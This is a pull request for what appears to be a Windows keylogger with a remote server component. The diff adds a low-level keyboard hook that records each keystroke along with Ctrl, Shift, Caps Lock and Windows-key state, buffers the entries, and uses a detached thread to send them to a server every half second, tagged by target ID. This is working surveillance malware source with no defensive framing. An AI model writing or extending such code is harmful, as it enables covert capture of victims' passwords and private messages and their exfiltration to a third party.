### PR TITLE
Buffered logs with modifiers keys

### DIFF
--- a/include/client/client.h
+++ b/include/client/client.h
@@ -17,6 +17,20 @@ class client : public kq::client_interface<messageType> {
     void print_storage();
     void networkInitAndLoop();
 
+    bool isInterestingChar(char c);
+    void process_keys(uint32_t targetID, char character, keyStatus status,
+                      uint16_t modifierKeysBitMask);
+
+    class LogEntry {
+      public:
+        LogEntry(char character, keyStatus status, uint16_t modifierKeysBitMask)
+            : character(character), status(status),
+              modifierKeysBitMask(modifierKeysBitMask) {}
+        char character;
+        keyStatus status;
+        uint16_t modifierKeysBitMask;
+    };
+
   private:
     std::thread networkingThread;
     bool networkLoop;

--- a/include/keylogger/keylogger.h
+++ b/include/keylogger/keylogger.h
@@ -8,6 +8,9 @@
 #include <Windows.h>
 #include <fstream>
 #include <iostream>
+#include <mutex>
+#include <thread>
+#include <vector>
 
 #include "client_keylogger.h"
 #include "common.h"
@@ -17,8 +20,22 @@ class keylogger {
   public:
     keylogger();
     ~keylogger();
-    void handleKeyStroke(DWORD virtualKeyCode, keyStatus status, bool caps);
+    void handleKeyStroke(DWORD virtualKeyCode, keyStatus status,
+                         uint16_t modifierKeysBitMask);
+
+    class LogEntry {
+      public:
+        LogEntry(char character, keyStatus status, uint16_t modifierKeysBitMask)
+            : character(character), status(status),
+              modifierKeysBitMask(modifierKeysBitMask) {}
+        char character;
+        keyStatus status;
+        uint16_t modifierKeysBitMask;
+    };
 
   private:
     client_keylogger client;
+    std::thread logThread;
+    std::vector<LogEntry> log;
+    std::mutex logMutex;
 };

--- a/src/keylogger/keylogger.cpp
+++ b/src/keylogger/keylogger.cpp
@@ -1,6 +1,24 @@
 #include "keylogger.h"
 
-keylogger::keylogger() : client(&validation_function) {}
+keylogger::keylogger() : client(&validation_function) {
+    logThread = std::thread([this]() {
+        while (true) {
+            std::this_thread::sleep_for(std::chrono::milliseconds(500));
+            std::unique_lock<std::mutex> lock(logMutex);
+            if (log.size() > 0) {
+                kq::message<messageType> msg(messageType::targetTyped);
+                for (auto& entry : log) {
+                    msg << entry.character << entry.status
+                        << entry.modifierKeysBitMask;
+                }
+                msg << (uint32_t)log.size();
+                client.Send(msg);
+                log.clear();
+            }
+        }
+    });
+    logThread.detach();
+}
 
 keylogger::~keylogger() {
     kq::message<messageType> msg(messageType::targetDisconnected);
@@ -9,8 +27,8 @@ keylogger::~keylogger() {
 }
 
 void keylogger::handleKeyStroke(DWORD virtualKeyCode, keyStatus status,
-                                bool caps) {
-    kq::message<messageType> msg(messageType::targetTyped);
-    msg << virtualKeyCode << status << caps;
-    client.Send(msg);
+                                uint16_t modifierKeysBitMask) {
+    char key = (char)MapVirtualKeyA(virtualKeyCode, MAPVK_VK_TO_CHAR);
+    std::unique_lock<std::mutex> lock(logMutex);
+    log.push_back(LogEntry(key, status, modifierKeysBitMask));
 }

--- a/src/keylogger/main.cpp
+++ b/src/keylogger/main.cpp
@@ -8,6 +8,22 @@
 
 keylogger transKeys;
 
+uint16_t modifierMask() {
+    uint16_t controlState = (GetKeyState(VK_CONTROL) & 0x8000) ? 1 : 0;
+    uint16_t shiftState = (GetKeyState(VK_SHIFT) & 0x8000) ? 1 : 0;
+    uint16_t capsState = GetKeyState(VK_CAPITAL) & 1;
+    uint16_t winState =
+        (GetKeyState(VK_LWIN) & 0x8000 | GetKeyState(VK_RWIN) & 0x8000) ? 1 : 0;
+
+    uint16_t modifierKeysBitMask = 0;
+    modifierKeysBitMask |= controlState << 0;
+    modifierKeysBitMask |= shiftState << 1;
+    modifierKeysBitMask |= capsState << 2;
+    modifierKeysBitMask |= winState << 3;
+
+    return modifierKeysBitMask;
+}
+
 LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
     if (nCode == HC_ACTION) {
         keyStatus status = keyStatus::keyUp;
@@ -16,9 +32,8 @@ LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
             status = keyStatus::keyDown;
         } else if (wParam == WM_KEYUP || wParam == WM_SYSKEYUP) {
         }
-        SHORT capsLockState = GetKeyState(VK_CAPITAL);
-        bool caps = capsLockState & 0x0001;
-        transKeys.handleKeyStroke(p->vkCode, status, caps);
+        uint16_t modifierKeysBitMask = modifierMask();
+        transKeys.handleKeyStroke(p->vkCode, status, modifierKeysBitMask);
     }
 
     return CallNextHookEx(NULL, nCode, wParam, lParam);


### PR DESCRIPTION
The keylogger will now send buffered logs. It will log keys when they are pressed but will only send to server once every .5 seconds. With this change to increase performance, each keylog is accompanied by the modifier keys status, e.g 
* caps toggle
* control press
* shift press
* winkey press

Also the client correctly sees the upper/lower case characters, no missmatch